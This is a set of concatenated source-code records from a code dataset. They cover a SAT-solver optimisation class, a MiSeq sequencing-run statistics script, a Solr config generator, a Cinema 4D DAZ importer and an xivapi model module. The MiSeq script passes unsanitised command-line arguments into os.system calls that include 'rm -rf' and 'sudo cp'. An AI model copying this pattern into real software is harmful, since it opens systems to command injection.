p, equiv = self.indicator(cnf)\n inds.append(p)\n clauses.extend(equiv)\n clauses.append(inds)\n return clauses\n\n def itotalizer(self, lits, ubound=None):\n \"\"\"\n **Added in SugarRush**\\n\n Uses :meth:`pysat.card.ITotalizer`.\n Adds automatic bookkeeping of literals.\n \"\"\"\n if ubound is None:\n ubound = len(lits)\n itot = ITotalizer(lits, ubound)\n clauses = itot.cnf.clauses\n bound_vars = itot.rhs\n self._add_lits_from(clauses)\n return clauses, bound_vars\n\n def optimize(self, itot, search=\"linear\"):\n if search == \"linear\":\n return self.optimize_linear(itot)\n elif search == \"binary\":\n return self.optimize_binary(itot)\n else:\n raise Exception(\"Unknown search method!\")\n\n def optimize_linear(self, itot):\n self.print_stats()\n ub = len(itot) - 1\n if not self.solve(assumptions=[-itot[ub]]):\n return None\n ub -= 1\n while ub >= 0:\n print(\"ub:\", ub)\n if not self.solve(assumptions=[-itot[ub]]):\n print(\"returning:\", ub + 1)\n return ub + 1\n else:\n ub -= 1\n return 0\n\n def optimize_binary(self, itot, debug=False):\n \"\"\"\n **Added in SugarRush**\\n\n Uses binary search to find the smallest satisfiable value for the ITotalizer.\n Assumes that satisfiability is monotonically increasing.\n \"\"\"\n upper = len(itot) - 1 # smallest known to be feasible\n lower = 0 # largest known to be infeasible (after initial check)\n if not self.solve(assumptions=[-itot[upper]]):\n return None\n if self.solve(assumptions=[-itot[lower]]):\n return 0\n while True:\n mid = (upper + lower) // 2\n dbg(\"upper: %d\" % upper, debug)\n dbg(\"mid: %d\" % mid, debug)\n dbg(\"lower: %d\" % lower, debug)\n if mid == lower:\n break\n satisfiable = self.solve(assumptions=[-itot[mid]])\n dbg(\"satisfiable: %d\" % satisfiable, debug)\n if satisfiable:\n upper = mid\n else:\n lower = mid\n dbg(\"\", debug)\n self.solve(assumptions=[-itot[upper]])\n return upper","sub_path":"sugarrush/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":17670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"387731108","text":"# coding=utf-8\n\nfrom xml.dom.minidom import parse\nimport xml.dom.minidom\nfrom decimal 
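# ---------------------------------------------------------------------------
# Hypothetical end-to-end use of itotalizer()/optimize() above: minimise how
# many of ten literals are true, given that each half must contain at least
# one true literal. Relies on pysat's ITotalizer semantics, where the k-th
# bound variable is true iff at least k+1 inputs are true; the constraint and
# sizes are illustrative.
from sugarrush.solver import SugarRush

with SugarRush() as solver:
    X = [solver.var() for _ in range(10)]
    solver.add([X[:5], X[5:]])                 # one true literal per half
    clauses, bounds = solver.itotalizer(X)
    solver.add(clauses)
    print(solver.optimize(bounds, search="binary"))   # -> 2
# ---------------------------------------------------------------------------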
import *\nimport os\nimport subprocess\nfrom subprocess import Popen, PIPE\nimport re\nimport logging\nimport argparse\nimport sys\nimport stat\nimport shutil\nfrom interop import py_interop_run_metrics, py_interop_run, py_interop_summary\nimport pandas as pd\nimport yaml\n\"\"\"\nEric Fournier\n2019-07-12\n\nProgram that computes the metrics of a MiSeq run\n\n\n\"\"\"\n\n\n\nlogging.basicConfig(level=logging.INFO)\n\n\n################################## Global Var #################################\n\n#Command-line parsing\nparser = argparse.ArgumentParser(description=\"MiSeq run statistics calculator\")\nparser.add_argument(\"-r\",\"--runno\",help=\"Name of the run in S/Partage/LSPQ_MiSeq\",required=True)\nparser.add_argument(\"-p\",\"--param\",help=\"Path to the parameter file\",required=True)\nparser.add_argument(\"-s\",\"--subdir\",help=\"Name of the cartridge subdirectory\",required=True)\n\nargs_commandline = parser.parse_args(sys.argv[1:])\nargs = args_commandline.__dict__\nproject_name = args[\"runno\"]\npath_param_file = args[\"param\"]\ncartridge_subdir = args[\"subdir\"]\n\nproject_year = project_name[0:4]\n\n#print \"CARTRIDGE IS \", cartridge_subdir\n\n\n#exit(0)\n\nsnakemake_param_handle = open(path_param_file)\nall_dict = yaml.safe_load(snakemake_param_handle)\nsnakemake_param_handle.close()\n\nlspq_miseq_experimental_dir = all_dict[\"lspq_miseq_subdir\"][0]\nlspq_miseq_miseqruntrace_dir = all_dict[\"lspq_miseq_subdir\"][1]\nlspq_miseq_sequencebrute_dir = all_dict[\"lspq_miseq_subdir\"][2]\nlspq_miseq_analyse_dir = all_dict[\"lspq_miseq_subdir\"][3]\n\n\n#Local temporary directory for the computations\ntemp_dir = \"/data/temp/TEMP_FASTQ\"\nrScript = \"/data/Applications/GitScript/MiSeqRunQuality/ComputeReadsStat2.R\"\n\nif not os.path.isdir(temp_dir):\n os.system(\"mkdir {0}\".format(temp_dir))\nelse:\n os.system(\"rm -rf {0}\".format(temp_dir))\n os.system(\"mkdir {0}\".format(temp_dir))\n\n\n#Run directory\nbasedir = os.path.join(all_dict[\"path\"][0],project_year,project_name)\nslbio_basedir = os.path.join(all_dict[\"path\"][1],project_name)\n\n#A few sanity checks\nif not os.path.isdir(basedir):\n logging.error(basedir + \" does not exist\")\n exit(0)\n\nif not os.path.isdir(slbio_basedir):\n logging.error(slbio_basedir + \" does not exist\")\n exit(0)\n\n#Directory containing the fastq files\n#fastq_dir = os.path.join(basedir,lspq_miseq_sequencebrute_dir)\nfastq_dir = os.path.join(slbio_basedir,cartridge_subdir)\nif not os.path.isdir(fastq_dir):\n logging.error(fastq_dir + \" does not exist\")\n exit(0)\n\ninterop_dir = os.path.join(basedir,lspq_miseq_miseqruntrace_dir,cartridge_subdir,\"InterOp\")\nif not os.path.isdir(interop_dir):\n logging.error(interop_dir + \" does not exist\")\n exit(0)\n\n#Make sure there are fastq files\nif not os.listdir(fastq_dir):\n logging.error(\"No fastq in \" + fastq_dir)\n exit(0)\n\n#The RunInfo.xml file\nruninfo_file = os.path.join(basedir,lspq_miseq_miseqruntrace_dir,cartridge_subdir,\"RunInfo.xml\")\n#print \"run info \", runinfo_file\nif not os.path.isfile(runinfo_file):\n logging.error(\"The file {0} is missing\".format(runinfo_file))\n exit(0)\n\n#The runParameters.xml file\nrunparam_file = os.path.join(basedir,lspq_miseq_miseqruntrace_dir,cartridge_subdir,\"runParameters.xml\")\nif not os.path.isfile(runparam_file):\n logging.error(\"The file {0} is missing\".format(runparam_file))\n exit(0)\n\n#Final results file\noutfile = open(os.path.join(temp_dir,\"MiSeqStat_\" + 
project_name + \"TEMP.txt\"),'w')\noutfile_append = open(os.path.join(temp_dir,\"MiSeqStat_\" + project_name + \".txt\"),'a+')\n\n#Metric de chacun des specimens\nallfile_qc_dict = {}\n\n#Key = nom du specimen Value = [nombre total de nucleaotid, genome coverage]\nallspec_cov_dict = {}\n\n\n################################## End Global Var #################################\n\n################################## Begin Function #################################\n\ndef ComputeGenomeCoverage(specname,nBnucleotid):\n \"\"\"\n Calcul de la couverture du genome pour ce specimen\n :param specname:\n :param nBnucleotid:\n \"\"\"\n nBnucleotid_r1_r2 = float(nBnucleotid) + float(allspec_cov_dict[specname][0])\n\n cov = round(nBnucleotid_r1_r2 / genome_length, 0)\n\n allspec_cov_dict[specname].append(cov)\n\n\n################################## End Function #################################\n\n\n################################## Begin Program #################################\nlogging.info(\" Start Calculation\")\n\nlogging.info(\" Calcul des metrics de la run\")\n\n#Recuperation du Q30 pour la run\nrun_metrics = py_interop_run_metrics.run_metrics()\nrun_folder = run_metrics.read(os.path.join(basedir,lspq_miseq_miseqruntrace_dir,cartridge_subdir))\nsummary = py_interop_summary.run_summary()\npy_interop_summary.summarize_run_metrics(run_metrics, summary)\nsummary.total_summary().yield_g()\n\ncolumns = (('% Over Q30', 'percent_gt_q30'),)\nrows = [('Total', summary.total_summary()),]\n\nd = []\nfor label, func in columns:\n d.append((pd.Series([getattr(r[1], func)() for r in rows], index=[r[0] for r in rows])))\n\nparse_d = re.search(r'Total\\s{4}(\\S+)',str(d[0]))\npercent_gt_q30 = round(float(parse_d.group(1)),0)\n\n#Recuperation des valeurs de cluster pour la run\ndef format_value(val):\n if hasattr(val, 'mean'):\n return val.mean()\n else:\n return val\n\nread = 0\ncolumns = (('Density (K/mm2)', 'density'),('% Cluster PF','percent_pf'))\nrows = [summary.at(read).at(lane) for lane in xrange(summary.lane_count())]\nd2 = []\nfor label, func in columns:\n d2.append( (pd.Series([format_value(getattr(r, func)()) for r in rows])))\n\ndensity = str(d2[0])\npercent_pf = str(d2[1])\n\nparse_density = re.search(r'\\S+\\s{4}(\\S+)',density)\ndensity = parse_density.group(1)\ndensity = round(float(density) / 1000,0)\n\nparse_percent_pf = re.search(r'\\S+\\s{4}(\\S+)',percent_pf)\npercent_pf = parse_percent_pf.group(1)\npercent_pf = round(float(percent_pf),0)\n\n#Calculs des Q30 pour les samples avec R\nlogging.info(\" Calcul des metrics des samples dans R\")\n\n\nos.system(\"Rscript {0} {1} {2} \".format(rScript,fastq_dir,temp_dir))\n\n#modif_20200121\nmin_q30_spec_dict = {}\n\n#Contruction du dictionnaire de metrics\ntry:\n # Fichier de resultat metrics genere par le rScript\n metric_file_from_R = open(os.path.join(temp_dir,\"fastqStat.txt\"))\n\n for line in metric_file_from_R:\n\n #print \"line is \", line\n\n line_parse = re.search(r'(\\S+)\\t(\\S+)\\t(\\S+)\\t(\\S+)',line)\n fastq_file = line_parse.group(1)\n\n if(fastq_file.find(\"RUN\") != -1):\n spec_name = \"RUN\"\n else:\n spec_name = fastq_file[:-3]\n\n min_q30_perc = line_parse.group(2)\n\n # modif_20200121\n spec = fastq_file.split('_')[0]\n try:\n min_q30_spec_dict[spec].append(min_q30_perc)\n except:\n min_q30_spec_dict[spec] = []\n min_q30_spec_dict[spec].append(min_q30_perc)\n\n\n nb_read = line_parse.group(3)\n nb_nucleotid = line_parse.group(4)\n allfile_qc_dict[fastq_file] = [min_q30_perc,nb_read]\n\n if spec_name in allspec_cov_dict.keys():\n 
pass\n #OBSOLETE\n #ComputeGenomeCoverage(spec_name,nb_nucleotid)\n elif spec_name.find(\"RUN\") == -1:\n allspec_cov_dict[spec_name] = [nb_nucleotid]\n\n metric_file_from_R.close()\n\nexcept Exception:\n logging.error(\"Problem reading the fastqStat.txt file\")\n exit(0)\n\n#Transfer the metrics into the final results file\nlogging.info(\" Reading the metrics\")\n\n#modif_20200121\noutfile.write(\"ID\\tNb_Reads\\tCluster_Density_K_mm2\\tCluster_Passing_Filter\\tOver_Q30\\tR1_R2_Mean_Q30\\n\")\n\nfor fastqfile in allfile_qc_dict.keys():\n if(fastqfile != \"RUN\"):\n #print fastqfile\n\n #modif_20200121\n spec = fastqfile.split('_')[0]\n mean_Q30 = \"---\"\n if re.search(r'_R1', fastqfile):\n mean_Q30 = (int(min_q30_spec_dict[spec][0]) + int(min_q30_spec_dict[spec][1])) / 2\n\n min_q30_perc = allfile_qc_dict[fastqfile][0]\n nb_read = allfile_qc_dict[fastqfile][1]\n\n # modif_20200121\n if mean_Q30 == \"---\":\n outfile.write(\"{0}{1}{2}{1}{3}{1}{4}{1}{5}{1}{6}\\n\".format(fastqfile, \"\\t\", nb_read, 'NA', 'NA', min_q30_perc, \"\"))\n else:\n outfile.write(\"{0}{1}{2}{1}{3}{1}{4}{1}{5}{1}{6}\\n\".format(fastqfile, \"\\t\", nb_read, 'NA', 'NA', min_q30_perc,\"<\" + str(mean_Q30) + \">\"))\n else:\n min_q30_perc = allfile_qc_dict[fastqfile][0]\n nb_read = allfile_qc_dict[fastqfile][1]\n outfile.write(\"{0}{1}{2}{1}{3}{1}{4}{1}{5}\\n\".format(fastqfile, \"\\t\", nb_read, density, percent_pf, percent_gt_q30))\n\noutfile.close()\n\nsortfile = os.path.join(temp_dir,\"MiSeqStat_\" + project_name + \".txt\")\nos.system(\"awk 'NR<2{print $0;next}{print $0 | \\\"sort -k1\\\" }' \" + outfile.name + \"> \" + sortfile)\n\n#Append the coverage values OBSOLETE\n#outfile_append.write(\"\\nID\\tCoverage\\n\")\n#for my_spec_name in allspec_cov_dict.keys():\n# outfile_append.write(\"{0}\\t{1}\\n\".format(my_spec_name,allspec_cov_dict[my_spec_name][1]))\n#outfile_append.close()\n\n\nos.system(\"sudo cp {0} {1}\".format(sortfile,os.path.join(basedir,lspq_miseq_miseqruntrace_dir,cartridge_subdir)))\n\nlogging.info(\" End Calculation\")\n\nexit(0)\n\n","sub_path":"MiSeqStat7.py","file_name":"MiSeqStat7.py","file_ext":"py","file_size_in_byte":9318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} {"seq_id":"347728510","text":"# Create Solr ZCML include from environment variables\n\nfrom os import environ\n\n\ndef main():\n solr_zcml_file = '/app/etc/package-includes/002-solr-overrides.zcml'\n\n host = environ.get('SOLR_HOST', 'solr')\n port = environ.get('SOLR_PORT', '8983')\n base = environ.get('SOLR_BASE', '/solr/ogsite')\n upload_blobs = environ.get('SOLR_UPLOAD_BLOBS', 'true')\n\n solr_zcml = SOLR_ZCML_TEMPLATE.format(\n host=host, port=port, base=base, upload_blobs=upload_blobs)\n\n with open(solr_zcml_file, 'w') as file_:\n file_.write(solr_zcml)\n\n\nSOLR_ZCML_TEMPLATE = \"\"\"\\\n\n \n \n\n\n\"\"\"\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"docker/core/entrypoint.d/create_solr_zcml.py","file_name":"create_solr_zcml.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} {"seq_id":"575378101","text":"import c4d\nimport os\nimport sys\nfrom c4d import documents, gui\n\nfrom .CustomCmd import Cinema4DCommands as dzc4d\nfrom . import DtuLoader\nfrom . import StandardMaterials\nfrom . import Utilities\nfrom . import Morphs\nfrom . import DazRig\nfrom . 
import Animations\nfrom .DtC4DWeights import Weights\nfrom .DtC4DPosing import Poses\nfrom .DtC4DDialogs import guiASKtoSave\nfrom .Definitions import EXPORT_DIR\n\ndazReduceSimilar = True\n\n\nclass CustomImports:\n \"\"\"\n Import Logic for Importing in the DTU File (JSON)\n \"\"\"\n\n # Hidden\n def manual_import_genesis(self, path):\n \"\"\"\n Manually Imports Figure of the Given Path\n \"\"\"\n dtu = DtuLoader.DtuLoader(path)\n fbx_path = dtu.get_fbx_path()\n self.genesis_import(fbx_path, dtu)\n\n def manual_import_prop(self, path):\n \"\"\"\n Manually Import Prop/Environment of the Given Path\n \"\"\"\n dtu = DtuLoader.DtuLoader(path)\n fbx_path = dtu.get_fbx_path()\n self.prop_import(fbx_path, dtu)\n\n def auto_import_genesis(self, sss_value, normal_value, bump_value):\n import_list = self.get_genesis_list()\n current_dir = os.getcwd()\n os.chdir(EXPORT_DIR)\n if import_list:\n for imported_dir in import_list:\n dtu = DtuLoader.DtuLoader(imported_dir)\n fbx_path = dtu.get_fbx_path()\n self.genesis_import(fbx_path, dtu, sss_value, normal_value, bump_value)\n\n os.chdir(current_dir)\n\n def auto_import_prop(self, sss_value, normal_value, bump_value):\n import_list = self.get_prop_list()\n current_dir = os.getcwd()\n os.chdir(EXPORT_DIR)\n if import_list:\n for imported_dir in import_list:\n dtu = DtuLoader.DtuLoader(imported_dir)\n fbx_path = dtu.get_fbx_path()\n self.prop_import(fbx_path, dtu, sss_value, normal_value, bump_value)\n os.chdir(current_dir)\n\n def genesis_import(self, file_path, dtu, sss_value, normal_value, bump_value):\n mat = StandardMaterials.StdMaterials()\n morph = Morphs.Morphs()\n var = Utilities.Variables()\n jnt_fixes = DazRig.JointFixes()\n wgt = Weights()\n anim = Animations.Animations()\n pose = Poses()\n\n if os.path.exists(file_path) == False:\n gui.MessageDialog(\n \"Nothing to import.\\nYou have to export from DAZ Studio first\",\n c4d.GEMB_OK,\n )\n return 0\n print(\"Import FBX from : {0}\".format(os.path.dirname(file_path)))\n c4d.EventAdd()\n self.import_daz_fbx(file_path)\n c4d.EventAdd()\n c4d.DrawViews(\n c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW\n | c4d.DRAWFLAGS_NO_THREAD\n | c4d.DRAWFLAGS_STATICBREAK\n )\n dzc4d.deselect_all() # Deselect All\n\n screen = c4d.gui.GeGetScreenDimensions(0, 0, True)\n\n c4d.EventAdd()\n dzc4d.update_viewport()\n c4d.CallCommand(300001026, 300001026) # Deselect All\n dzc4d.del_unused_mats()\n c4d.EventAdd()\n\n var.store_dtu(dtu)\n if var.prepare_variables():\n gui.MessageDialog(\n \"Import Failed.\\nYou can check the console for more info (Shift + F10)\",\n c4d.GEMB_OK,\n )\n print(\"Import Failed\")\n return\n print(\"Import Done\")\n\n print(\"Starting Material Updates\")\n\n c4d.EventAdd()\n c4d.DrawViews(\n c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW\n | c4d.DRAWFLAGS_NO_THREAD\n | c4d.DRAWFLAGS_STATICBREAK\n )\n c4d.EventAdd()\n c4d.CallCommand(300001026, 300001026) # Deselect All\n dzc4d.del_unused_mats()\n mat.store_materials(dtu)\n mat.store_sliders(sss_value, normal_value, bump_value)\n mat.update_materials()\n\n print(\"Material Conversion Done\")\n c4d.EventAdd()\n\n wgt.store_subdivision(dtu)\n if wgt.check_level():\n auto_weight = c4d.gui.QuestionDialog(\n \"Subdivisions have been detected\\nthis is currently not fully supported.\\nWould you like to autoweight the mesh?\"\n )\n if auto_weight:\n wgt.auto_calculate_weights(var.body)\n\n pose.store_pose(dtu)\n pose.store_offset(dtu)\n is_posed = pose.checkIfPosed()\n is_anim = anim.check_animation_exists(var.c_joints)\n clear_pose = False\n if is_posed:\n clear_pose = 
gui.QuestionDialog(\n \"Importing Posed Figure is currently not fully supported\\nWould you like to try to fix bone orientation?\",\n )\n if clear_pose:\n pose.clear_pose(var.c_joints)\n pose.fix_offset(var.c_joints, var.c_skin_data)\n\n if is_anim == False or clear_pose:\n jnt_fixes.store_joint_orientations(dtu)\n jnt_fixes.fix_joints(var.c_skin_data, var.c_joints, var.c_meshes)\n c4d.EventAdd()\n dzc4d.deselect_all()\n if is_posed:\n pose.restore_pose(var.c_joints)\n make_tpose = gui.QuestionDialog(\n \"Would you like to Convert\\nthe Base Pose to a T-Pose?\",\n )\n if make_tpose:\n pose.preAutoIK()\n c4d.EventAdd()\n\n else:\n gui.MessageDialog(\n \"Animation or a Pose was Detected\\nJoint Orientation has not been fixed\",\n type=c4d.GEMB_ICONEXCLAMATION,\n )\n c4d.EventAdd()\n\n if var.body.GetTag(c4d.Tposemorph):\n print(\"Starting Morph Updates\")\n morph.store_morph_links(dtu)\n morph.store_variables(\n var.body, var.c_meshes, var.c_joints, var.skeleton, var.c_poses\n )\n morph.morphs_to_delta()\n morph.delete_morphs(var.c_meshes)\n morph.connect_morphs_to_parents(var.body, var.c_meshes)\n morph.add_drivers()\n morph.rename_morphs(var.c_meshes)\n print(\"Morph Corrections Done\")\n c4d.EventAdd()\n\n c4d.DrawViews(\n c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW\n | c4d.DRAWFLAGS_NO_THREAD\n | c4d.DRAWFLAGS_STATICBREAK\n )\n c4d.EventAdd()\n\n self.dialog = guiASKtoSave()\n self.dialog.Open(\n dlgtype=c4d.DLG_TYPE_MODAL,\n xpos=screen[\"sx2\"] // 2 - 210,\n ypos=screen[\"sy2\"] // 2 - 100,\n defaultw=200,\n defaulth=150,\n )\n\n def prop_import(self, file_path, dtu, sss_value, normal_value, bump_value):\n\n mat = StandardMaterials.StdMaterials()\n if os.path.exists(file_path) == False:\n gui.MessageDialog(\n \"Nothing to import.\\nYou have to export from DAZ Studio first\",\n c4d.GEMB_OK,\n )\n return 0\n print(\"Import FBX from : {0}\".format(os.path.dirname(file_path)))\n self.import_daz_fbx(file_path)\n c4d.DrawViews(\n c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW\n | c4d.DRAWFLAGS_NO_THREAD\n | c4d.DRAWFLAGS_STATICBREAK\n )\n dzc4d.deselect_all() # Deselect All\n\n screen = c4d.gui.GeGetScreenDimensions(0, 0, True)\n\n c4d.EventAdd()\n dzc4d.update_viewport()\n c4d.CallCommand(300001026, 300001026) # Deselect All\n dzc4d.del_unused_mats()\n c4d.EventAdd()\n print(\"Import Done\")\n\n print(\"Starting Material Updates\")\n c4d.EventAdd()\n c4d.DrawViews(\n c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW\n | c4d.DRAWFLAGS_NO_THREAD\n | c4d.DRAWFLAGS_STATICBREAK\n )\n c4d.EventAdd()\n c4d.CallCommand(300001026, 300001026) # Deselect All\n dzc4d.del_unused_mats()\n mat.store_materials(dtu)\n mat.store_sliders(sss_value, normal_value, bump_value)\n mat.update_materials()\n\n print(\"Material Conversion Done\")\n c4d.EventAdd()\n\n c4d.DrawViews(\n c4d.DRAWFLAGS_ONLY_ACTIVE_VIEW\n | c4d.DRAWFLAGS_NO_THREAD\n | c4d.DRAWFLAGS_STATICBREAK\n )\n c4d.EventAdd()\n\n self.dialog = guiASKtoSave()\n self.dialog.Open(\n dlgtype=c4d.DLG_TYPE_MODAL,\n xpos=screen[\"sx2\"] // 2 - 210,\n ypos=screen[\"sy2\"] // 2 - 100,\n defaultw=200,\n defaulth=150,\n )\n\n def import_daz_fbx(self, file_path):\n \"\"\" \"\"\"\n flags = (\n c4d.SCENEFILTER_OBJECTS\n | c4d.SCENEFILTER_MATERIALS\n | c4d.SCENEFILTER_MERGESCENE\n )\n\n file = c4d.documents.LoadDocument(\n str(file_path),\n flags,\n )\n c4d.documents.InsertBaseDocument(file)\n\n def get_genesis_list(self):\n \"\"\"\n Returns the Absolute Paths of the Exports from Daz for Figures\n \"\"\"\n import_list = []\n if os.path.exists(os.path.join(EXPORT_DIR, \"FIG\")):\n for i in 
os.listdir(os.path.join(EXPORT_DIR, \"FIG\")):\n import_list.append(os.path.join(EXPORT_DIR, \"FIG\", i))\n return import_list\n else:\n gui.MessageDialog(\n \"Could Not find Exported File from Daz Studio\",\n type=c4d.GEMB_ICONEXCLAMATION,\n )\n\n def get_prop_list(self):\n \"\"\"\n Returns the Absolute Paths of the Exports from Daz for Environments and Props\n \"\"\"\n import_list = []\n if os.path.exists(os.path.join(EXPORT_DIR, \"ENV\")):\n for i in os.listdir(os.path.join(EXPORT_DIR, \"ENV\")):\n import_list.append(os.path.join(EXPORT_DIR, \"ENV\", i))\n return import_list\n else:\n gui.MessageDialog(\n \"Could Not find Exported File from Daz Studio\",\n type=c4d.GEMB_ICONEXCLAMATION,\n )\n","sub_path":"Cinema 4D/appdir_common/plugins/DazToC4D/lib/CustomImports.py","file_name":"CustomImports.py","file_ext":"py","file_size_in_byte":9883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"4023722","text":"from typing import Dict, List\nfrom abc import ABC, abstractmethod\n\n\n__all__ = ['Elem', 'ElemList', 'ElemGroup', 'Model', 'Index']\n\n\nclass BaseElem(ABC):\n __slots__ = ('keys', '_transform')\n\n def __init__(self, *keys):\n self.keys = keys\n self._transform = None\n\n def __repr__(self):\n return f'{self.__class__.__name__}({\" \".join(self.keys)})'\n\n def set_transform(self, t):\n \"\"\"\n Callable that will transform input data after parsing. For example, to enforce a type.\n Set during model subclass load.\n \"\"\"\n if t is not None:\n self._transform = t\n\n def do_transform(self, model: 'Model', data):\n \"\"\"\n Transform input data (already parsed and filtered) into usable output.\n \"\"\"\n if len(data) == 1:\n data = list(data.values())[0]\n\n if data is None:\n return\n\n if issubclass(self._transform, Model):\n return self._transform(model.client, data)\n elif isinstance(data, dict):\n return self._transform(**data)\n elif data is not None:\n return self._transform(data)\n\n @abstractmethod\n def parse(self, model: 'Model', data):\n \"\"\"\n Parse data and return relevant data to be returned from the attribute.\n \"\"\"\n\n\nclass Elem(BaseElem):\n \"\"\"\n class _(Model):\n a: str = Elem('a')\n\n simple element.\n multiple keys can be specified to pass multiple data entries to the transform\n \"\"\"\n __slots__ = () # make sure this doesn't get assigned a __dict__\n\n def parse(self, model: 'Model', data):\n return self.do_transform(model, {k: data.get(k, None) for k in self.keys})\n\n\nclass ElemList(BaseElem):\n \"\"\"\n class _(Model):\n a: str = ElemList('a')\n\n Ensure that at least the first key given is a list in the data\n \"\"\"\n __slots__ = () # make sure this doesn't get assigned a __dict__\n\n def parse(self, model: 'Model', data):\n return [\n self.do_transform(model, {\n key: data[key][i] if isinstance(data[key], list) else data[key]\n for key in self.keys\n })\n # since we requested the first key get us an iterable, we can base the length on this\n for i in range(len(data[self.keys[0]]))\n ]\n\n\nclass ElemGroup(BaseElem):\n \"\"\"\n class _(Model):\n a: str = Elem('a*', 'b')[3]\n b: str = Elem('c*', 'b')[1:4]\n\n Groups up params following a pattern including a number and returns a list\n \"\"\"\n __slots__ = ('range',)\n\n def __init__(self, *keys):\n super().__init__(*keys)\n self.range = None\n\n def __getitem__(self, item):\n self.range = item\n return self\n\n def parse(self, model: 'Model', data):\n if self.range is None:\n raise TypeError(\"No range provided in ElemGroup[...]\")\n\n # 
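# ---------------------------------------------------------------------------
# Hypothetical driver for the DazToC4D importer above (slider values are
# illustrative percentages; inside Cinema 4D this class is normally driven by
# the plugin's dialog rather than instantiated directly). Note that
# manual_import_genesis()/manual_import_prop() as written pass only two
# arguments to genesis_import()/prop_import(), which also expect the
# sss/normal/bump slider values, so the auto_import_* path is the one that
# runs end to end:
importer = CustomImports()
importer.auto_import_genesis(sss_value=50.0, normal_value=100.0, bump_value=100.0)
# ---------------------------------------------------------------------------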
convert __getitem__ input to a range to iterate over\n if isinstance(self.range, slice):\n r = range(self.range.start or 0, self.range.stop+1, self.range.step or 1)\n else:\n r = range(self.range+1) # int input\n\n return [a for a in[\n # execute the Element transform over this key variation\n self.do_transform(model, {\n # generate this key variation and include it in the data\n # keys not containing * are passed untouched to each transform\n k.replace('*', ''): data[k.replace('*', str(i))]\n for k in self.keys\n })\n for i in r # iterate over possible key variations\n ] if a is not None]\n\n\n\nclass Model:\n __slots__ = ('client', '_raw_data_',) # in case subclasses want to use __slots__\n\n elems: Dict[str, BaseElem]\n __repr_attrs__: List[str] = ['id']\n\n def __init__(self, client, _dct=None, **kwargs):\n\n self.client = client\n\n # allow a dict to be passed in directly\n # allows Models to be set as Elem transforms easily\n if _dct is not None:\n kwargs.update(_dct)\n\n # store raw data as a pass-through for backwards-compatibility\n self._raw_data_ = kwargs\n\n @classmethod\n def __init_subclass__(cls):\n \"\"\"called when anything subclasses Model, lets us process the attributes\"\"\"\n super().__init_subclass__()\n # filter to only Elems\n cls.elems = {}\n for k, e in cls.__dict__.items():\n if isinstance(e, BaseElem):\n e.set_transform(cls.__annotations__.get(k, None))\n cls.elems[k] = e\n\n def __getattribute__(self, item):\n if item in super(Model, self).__getattribute__('elems'):\n try:\n return self.elems[item].parse(self, self._raw_data_)\n except KeyError:\n raise AttributeError(item)\n else:\n return super(Model, self).__getattribute__(item)\n\n def __repr__(self):\n # TODO: sloppy and doesn't work well\n repr_attrs = [\n f'{e}:{getattr(self, e)}'\n for e in self.__repr_attrs__\n if getattr(self, e, None) is not None\n ]\n return f\"{self.__class__.__name__}({' '.join(repr_attrs)})\"\n\n def __getitem__(self, key):\n \"\"\"\n For backwards compatibility, this class can be used like a dict.\n This will function as a simple pass-through to the stored raw data.\n \"\"\"\n return self._raw_data_[key]\n\n @classmethod\n def columns(cls):\n s = set()\n for e in cls.elems.values():\n s.update(e.keys)\n\n return list(s)\n\n\nclass Index:\n \"\"\"\n Represents something that can be accessed at a /index/id endpoint.\n Subclassing this simply adds it to a dict so it can be looked up later.\n This lets Result.get() work for example.\n Could add more in the future\n \"\"\"\n types: Dict[str, type] = {}\n\n @classmethod\n def __init_subclass__(cls):\n super().__init_subclass__()\n Index.types[cls.__name__.lower()] = cls\n","sub_path":"xivapi/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"430053296","text":"\"\"\"\nType annotations for comprehendmedical service client.\n\n[Open documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_comprehendmedical/client.html)\n\nUsage::\n\n ```python\n import boto3\n from mypy_boto3_comprehendmedical import ComprehendMedicalClient\n\n client: ComprehendMedicalClient = boto3.client(\"comprehendmedical\")\n ```\n\"\"\"\nimport sys\nfrom typing import Any, Dict, Type\n\nfrom botocore.client import BaseClient, ClientMeta\n\nfrom .type_defs import (\n ComprehendMedicalAsyncJobFilterTypeDef,\n DescribeEntitiesDetectionV2JobResponseTypeDef,\n DescribeICD10CMInferenceJobResponseTypeDef,\n 
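# ---------------------------------------------------------------------------
# Minimal use of the Elem/Model machinery above, following the pattern shown
# in the class docstrings; the field names and data are illustrative, and no
# client object is needed for plain parsing:
class Item(Model):
    name: str = Elem('Name')
    price: int = Elem('PriceMid')

item = Item(None, _dct={"Name": "Iron Sword", "PriceMid": 312})
print(item.name, item.price)   # attribute access runs Elem.parse -> Iron Sword 312
# ---------------------------------------------------------------------------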
